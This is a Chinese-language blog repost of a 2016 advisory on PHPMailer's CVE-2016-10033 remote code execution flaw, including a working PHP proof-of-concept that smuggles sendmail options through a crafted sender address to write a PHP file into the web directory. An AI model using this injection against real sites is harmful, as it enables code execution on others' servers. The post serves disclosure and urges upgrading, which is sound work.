?

Dec 28 2016

PHPMailer曝遠程代碼執行高危漏洞(CVE-2016-10033)含PoC

首頁 » 漏洞收集 » PHPMailer曝遠程代碼執行高危漏洞(CVE-2016-10033)含PoC   

14827602659483.jpg

這次曝出遠程代碼執行漏洞的是堪稱全球最流行郵件發送類的PHPMailer,據說其全球范圍內的用戶量大約有900萬——每天還在持續增多。

GitHub上面形容PHPMailer“可能是全球PHP發送郵件最流行的代碼。亦被諸多開源項目所采用,包括WordPress、Drupal、1CRM、Joomla!等”。所以這個漏洞影響范圍還是比較廣的,漏洞級別也為Critical最高級。

漏洞編碼

CVE-2016-10033

影響版本

PHPMailer <  5.2.18

漏洞級別

高危

漏洞描述

獨立研究人員Dawid Golunski發現了該漏洞——遠程攻擊者利用該漏洞,可實現遠程任意代碼在web服務器賬戶環境中執行,并使web應用陷入威脅中。攻擊者主要在常見的web表單如意見反饋表單,注冊表單,郵件密碼重置表單等使用郵件發送的組件時利用此漏洞。

不過有關該漏洞的細節信息,研究人員并未披露,期望給予網站管理員更多的時間來升級PHPMailer類,避免受漏洞影響。

漏洞PoC

實際上Dawid Golunski已經做了個可行的RCE PoC,不過會遲一些再發布。關注視頻PoC請點擊:https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

更新:PoC代碼已經公布,請站長們盡快升級!

<?php /* 
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033) 
A simple PoC (working on Sendmail MTA) 
It will inject the following parameters to sendmail command: 
Arg no. 0 == [/usr/sbin/sendmail] 
Arg no. 1 == [-t] 
Arg no. 2 == [-i] 
Arg no. 3 == [-fattacker\] 
Arg no. 4 == [-oQ/tmp/] 
Arg no. 5 == [-X/var/www/cache/phpcode.php] 
Arg no. 6 == [some"@email.com] 
which will write the transfer log (-X) into /var/www/cache/phpcode.php file. 
The resulting file will contain the payload passed in the body of the msg: 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306 
09607 <<< Content-Type: text/html; charset=us-ascii 
09607 <<< 
09607 <<< <?php phpinfo(); ?> 09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306-- 
See the full advisory URL for details. 
*/ // Attacker's input coming from untrusted source such as $_GET , $_POST etc.  // For example from a Contact form  $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'; 
$msg_body  = "<?php phpinfo(); ?>"; // ------------------  // mail() param injection via the vulnerability in PHPMailer  require_once('class.phpmailer.php'); 
$mail = new PHPMailer(); // defaults to using php "mail()"  $mail->SetFrom($email_from, 'Client Name'); 
$address = "[email protected]"; 
$mail->AddAddress($address, "Some User"); 
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033"; 
$mail->MsgHTML($msg_body); if(!$mail->Send()) { echo "Mailer Error: " . $mail->ErrorInfo; 
} else { echo "Message sent!\n"; 
}

漏洞修復

更新到5.2.18:https://github.com/PHPMailer/PHPMailer

漏洞詳情目前已經提交給了PHPMailer官方——官方也已經發布了PHPMailer 5.2.18緊急安全修復,解決上述問題,受影響的用戶應當立即升級。詳情可參見:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md

 

https://www.exploit-db.com/exploits/40968/

*本文投稿作者:lmj,轉載須注明來自FreeBuf.COM

如果您喜歡本博客,歡迎點擊圖片定訂閱到郵箱填寫您的郵件地址,訂閱我們的精彩內容:

正文部分到此結束

文章標簽:這篇文章木有標簽

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «C# 帶簽名dll破解 | python之提速千倍爆破一句話»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖